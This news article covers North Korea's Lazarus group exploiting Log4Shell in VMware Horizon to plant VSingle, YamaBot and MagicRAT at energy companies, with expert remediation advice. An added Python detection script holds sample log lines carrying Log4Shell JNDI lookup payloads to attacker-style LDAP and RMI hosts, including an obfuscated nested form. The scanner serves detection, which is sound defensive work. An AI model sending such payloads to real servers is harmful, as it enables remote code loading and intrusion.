Lazarus Hackers Exploiting Log4j Vulnerabilities to Target U.S. Energy Companies

North Korean Lazarus group is targeting critical infrastructure through existing Log4j vulnerabilities and newly developed MagicRAT malware.

September 9, 2022

North Korean Advanced Persistent Threat (APT) group APT38, also known as the Lazarus group, is targeting energy companies in the U.S., Japan, and Canada. According to Cisco Talos, APT38 targets VMware Horizon instances by exploiting the widely prevalent Log4j vulnerabilities.

APT38, commonly known as Lazarus and Hidden Cobra, is a North Korean state-sponsored cybercrime group that earned infamy by orchestrating the $620 million Ronin Network crypto heist, the biggest cryptocurrency theft in history, in April 2022. It was also behind the WannaCry ransomware attack in 2017 and other data exfiltration and cyber espionage activities.

The nation-state group kicked off its latest campaign against energy companies in February 2022, a couple of months before the Ronin Network crypto heist. According to threat research firm Cisco Talos, APT38’s campaign was active until July this year.

Lazarus established its initial entry point into internet-facing VMware Horizon installations by exploiting the highly prevalent Log4Shell vulnerabilities in the Java-based logging framework Log4j.

“The Log4j exploit used in these attacks has been known, and called critical, for over a year. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet,” Erich Kron, security awareness advocate at KnowBe4, told Spiceworks.

“In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, it seems there are still systems that have not been patched yet. This poses a huge threat to some of the most critical systems within the critical infrastructure space.”

In July 2022, the Department of Homeland Security’s Cyber Safety Review Board (CSRB) described Log4Shell vulnerabilities as endemic given the ubiquity of Log4j across a multitude of computer and industrial control systems, servers, and networks. CSRB assessed that it could take up to a decade, maybe more, for organizations worldwide to patch Log4Shell flaws.
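As an added example that is not part of the article or of Cisco Talos’ research: a small Python checker that scans web-access log lines for the Log4Shell JNDI lookup the campaign above relied on, collapsing nested ${...} wrappers first so an obfuscated lookup is not missed. The log format, hosts and paths are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines for a VMware Horizon web portal; none of
# them come from the article or from Cisco Talos. Line 2 carries a plain JNDI
# lookup, line 3 a nested one, line 4 a harmless ${...} expression.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Feb/2022:03:12:44 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Feb/2022:03:13:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Feb/2022:03:13:07 +0000] "GET /portal/?q=${${lower:j}ndi:rmi://203.0.113.7:1099/x} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Feb/2022:03:14:20 +0000] "GET /portal/?tpl=${ctx:user} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# An inner Log4j lookup such as ${lower:j} or ${::-j} evaluates to the text after
# its last ':' or '-'. Collapsing those wrappers exposes what Log4j would resolve.
# The negative lookahead keeps a jndi: lookup itself from being collapsed away.
INNER_LOOKUP = re.compile(r"\$\{(?!jndi:)[^${}]*[:\-]([^${}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse nested ${...} wrappers until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, INNER_LOOKUP.sub(r"\1", text)
    return text


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line that contains a JNDI lookup after normalisation."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        match = JNDI_LOOKUP.search(normalized)
        if match:
            findings.append({
                "line": number,
                "scheme": match.group(1).lower(),          # ldap, rmi, dns, ...
                "evidence": normalized[match.start():match.start() + 60],
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: jndi:{finding['scheme']} lookup -> {finding['evidence']}")
```

Run against real access logs, the same scan applied to any request field that Log4j ends up logging (User-Agent, X-Forwarded-For, URL parameters) is the quickest way to tell whether an unpatched Horizon instance was probed before it was taken off the internet.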

Once in, Lazarus deployed VSingle and YamaBot, two malware strains exclusive to its operations, and a third “relatively simple” remote access trojan dubbed MagicRAT by Cisco Talos. The company clarified that Symantec and South Korea’s AhnLab previously detailed the campaign but Lazarus has updated its M.O., evident from the use of MagicRAT.

Lazarus first establishes a reverse shell and manually sets up a backdoor into the compromised systems through VSingle, which then allows it to establish another reverse shell. VSingle serves as a reconnaissance, backdoor and exfiltration tool to execute arbitrary code, download plugins, and create the possibility of lateral movement.

It also prepares for the next step: the theft of credentials. Meanwhile, YamaBot is set up to establish communication between the target system and the command-and-control (C2) servers.


Finally, MagicRAT is deployed after being downloaded from a remote location. MagicRAT is a simple remote access trojan that uses the Qt framework, performs system environment reconnaissance and can download additional payloads, such as custom-built port scanners and other malware, such as TigerRAT.

Since the Qt framework is a library for developing graphical user interfaces, something that serves no purpose in the attack, Talos said its purpose in MagicRAT is “making human analysis harder, and automated detection through machine learning and heuristics less likely.”

“The discovery of MagicRAT in the wild is an indication of Lazarus’ motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide,” Talos added.

[Figure] Lazarus Group Attack Chain Against Energy Companies Through Log4Shell Using MagicRAT | Source: Cisco Talos

The Lazarus attack campaign against American, Japanese, and Canadian energy companies involves regular and custom-made malware for specific operations. Chris Clements, vice president of solutions architecture at Cerberus Sentinel, told Spiceworks, “The targeted nature of their campaigns also means they can take target-specific approaches by analyzing the individual behaviors and operations at their objective organization.”

“Most general cybercrime is opportunistic in nature, using simple and cheap means such as mass phishing campaigns and automated password guessing bots to cast a wide net to potential victims. That the non-targeted approach is so regularly successful should give us pause when assessing the risk of a hyper targeted attack from highly skilled adversaries with both ample budget and a specific mission,” he added.

Cisco Talos believes that the primary goal of the Lazarus campaign is to help the Kim Jong-un regime by establishing long-term access to the networks of energy companies.

It also aligns with the group’s previous attacks against critical infrastructure, also at the behest of the North Korean government. Kron noted that besides stealing intellectual property, the access could be weaponized “and potentially cripple many power and energy sites across the country.”

CISA has a dedicated page for cybercriminal activity emanating from North Korea. The U.S. State Department has put a $10 million bounty, double the original $5 million, for information on DPRK-linked malicious cyber activity and threat actors.

Clements said it is still possible to mitigate risk by investing in cybersecurity fundamentals, beginning with a strong cultural approach. This includes investing in segmentation, attack surface reduction, and system hardening tools, and enhancing threat hunting and rapid alerting on suspicious behavior to neutralize threats quickly. He also advocated conducting penetration testing to identify vulnerabilities arising from omissions or misconfigurations before attackers can exploit them.

“The problem is that it’s easy enough to say and understand the factors that contribute to cybersecurity resiliency, but implementation is challenging, especially in organizations with competing priorities and limited resources. To be successful, leaders must own the reality of cybersecurity threats and dedicate both the human and monetary resources to protecting their organizations.”

– Chris Clements, VP of solutions architecture at Cerberus Sentinel

For organizations running software affected by the Log4j vulnerabilities, which is a great many of them, Kron advised that they “should immediately remove direct internet access from the devices until the vulnerabilities are mitigated.” Log4j accounted for 14% of the total exploitation incidents between March 2021 and April 2022.
